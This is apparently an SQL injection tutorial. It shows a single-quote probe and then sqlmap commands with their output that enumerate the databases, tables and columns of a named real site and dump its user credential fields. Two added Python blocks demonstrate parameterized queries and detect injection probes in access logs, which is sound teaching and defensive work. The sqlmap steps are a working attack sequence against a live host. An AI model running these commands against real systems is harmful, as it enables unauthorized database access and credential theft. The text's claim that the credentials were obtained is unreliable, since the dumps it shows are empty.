All we need is a vulnerable web page. Let's say you have a URL like this:
http://www.site.com/section.php?id=51
and that it is prone to SQL injection because the developer of that site did not properly escape the parameter id.
This can be tested simply by trying to open the URL
http://www.site.com/section.php?id=51'
We just added a single quote to the parameter. If this URL throws an error, it is clear that the database has reacted with an error because it received an unexpected single quote.
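The paragraph above describes the root cause (the raw id value is pasted into the SQL text) without showing it. The following is an added example, not code from the original page or from the site it describes: an in-memory SQLite table stands in for the MySQL database, and the table name, columns and rows are constructed. It places the vulnerable string-concatenated query beside a parameterized one and beside an integer check, and runs the page's single-quote probe through all three so you can see why the first one errors and the other two do not.

```python
import re
import sqlite3

# Added example, not code from the original page. An in-memory SQLite table stands in
# for the site's MySQL database; the table name, columns and rows are constructed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE section (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO section VALUES (?, ?)",
                     [(50, "Intro"), (51, "Abstracts 2010"), (52, "News")])
    return conn

def lookup_vulnerable(conn, raw_id):
    """The pattern the page describes: the raw ?id= value is pasted into the SQL text.
    Returns (rows, error) where error is the database's message, if any."""
    sql = "SELECT id, title FROM section WHERE id = '" + raw_id + "'"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        # A stray quote breaks the statement; this is the error the probe looks for.
        return [], str(exc)

def lookup_parameterized(conn, raw_id):
    """Same query with a bound parameter: the value is sent as data, never parsed as
    SQL, so a quote inside it simply fails to match any row."""
    sql = "SELECT id, title FROM section WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall(), None

def parse_id(raw_id):
    """Input validation that belongs in front of either query: an id must be a
    positive decimal integer; anything else is rejected before it reaches the database."""
    return int(raw_id) if re.fullmatch(r"[1-9]\d*", raw_id) else None

if __name__ == "__main__":
    db = make_db()
    for probe in ("51", "51'"):
        print("vulnerable   ", repr(probe), lookup_vulnerable(db, probe))
        print("parameterized", repr(probe), lookup_parameterized(db, probe))
        print("validated    ", repr(probe), parse_id(probe))
```

Running it shows the asymmetry the text relies on: the concatenated query returns the row for `51` and an error for `51'`, while the parameterized query returns the row for `51` and an empty result, with no error, for `51'`. The integer check is the cheaper first line of defence; parameterized queries are the one that still holds when a parameter legitimately contains text.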
Step 1 – Finding Databases
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 --dbs
Output
----------
web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:00:51] [INFO] fetching database names
available databases [2]:
[*] 554777
[*] information_schema
Step 2 – Finding the table names
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 --tables
Output
----------
web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:01:25] [INFO] fetching tables for database: '554777'
Database: 554777
[6 tables]
+---------------+
| abstract |
| answer |
| author |
| news_details |
| reporter_list |
| user |
+---------------+
Step 3 – Finding the columns
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user --columns
Output
----------
web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:01:48] [INFO] fetching columns for table 'user' in database '554777'
Database: 554777
Table: user
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
| role | varchar(50) |
| username | varchar(50) |
+----------+-------------+
Step 4 – Finding column values
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user -C username --dump
Output
----------
Database: 554777
Table: user
[0 entries]
+----------+
| username |
+----------+
+----------+
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user -C password --dump
Output
----------
Database: 554777
Table: user
[0 entries]
+----------+
| password |
+----------+
+----------+
So we get both the username and the password.
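Steps 1 to 4 above are what the enumeration looks like from the attacker's side. From the server's side, the same activity leaves a recognizable trace: requests whose numeric parameter (id, batch) suddenly carries a quote or other non-digit characters, often followed by 5xx responses from the broken query. The following is an added example, not part of the original page, that pulls that signal out of Apache combined-format access logs. The log lines, IP addresses (RFC 5737 test ranges), timestamps and sizes are constructed, and the set of parameters treated as integers is an assumption about the site.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Added example, not part of the original page. The log lines below are constructed
# (RFC 5737 test addresses, made-up timestamps and sizes), in Apache combined format.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2014:13:00:40 +0000] "GET /section.php?id=51 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:13:00:51 +0000] "GET /section.php?id=51%27 HTTP/1.1" 500 233 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:13:01:02 +0000] "GET /abstract.php?batch=2010%27 HTTP/1.1" 500 233 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2014:13:02:00 +0000] "GET /abstract.php?batch=2010 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
this line is not in combined format and is skipped
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Parameters the application treats as integers (an assumption about this site).
INTEGER_PARAMS = {"id", "batch"}

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # parse_qsl percent-decodes, so %27 comes back as a literal single quote.
    rec["params"] = parse_qsl(urlsplit(rec["target"]).query, keep_blank_values=True)
    return rec

def malformed_int_params(params):
    """Return the (name, value) pairs whose value is not a plain decimal integer."""
    return [(k, v) for k, v in params
            if k in INTEGER_PARAMS and not re.fullmatch(r"\d+", v)]

def analyze(log_text):
    """Aggregate per client IP: how many requests carried a malformed integer
    parameter, how many of those drew a 5xx response, and the values that were sent."""
    report = defaultdict(lambda: {"probes": 0, "errors": 0, "values": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        bad = malformed_int_params(rec["params"])
        if not bad:
            continue
        entry = report[rec["ip"]]
        entry["probes"] += 1
        if 500 <= rec["status"] < 600:
            entry["errors"] += 1
        entry["values"].extend(v for _, v in bad)
    return dict(report)

if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, entry)
```

On the constructed log the report names only 203.0.113.7, with two probes and two server errors, while the client that sent well-formed integers never appears. A probe that draws a 500 is the strongest single signal, because it is exactly the database error the page tells the reader to look for; a client that produces several such pairs in quick succession is worth an alert regardless of what user agent it claims.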
If the name is username and the password is password, why can I not log in to http://abstract.freevar.com/phpmyadmin?
Username and password are database user field values. They are not the original phpmyadmin username and password.
Using the username and password you can only log in to the corresponding website.
In http://abstract.freevar.com I have not included any login page, so you can't log in to that website.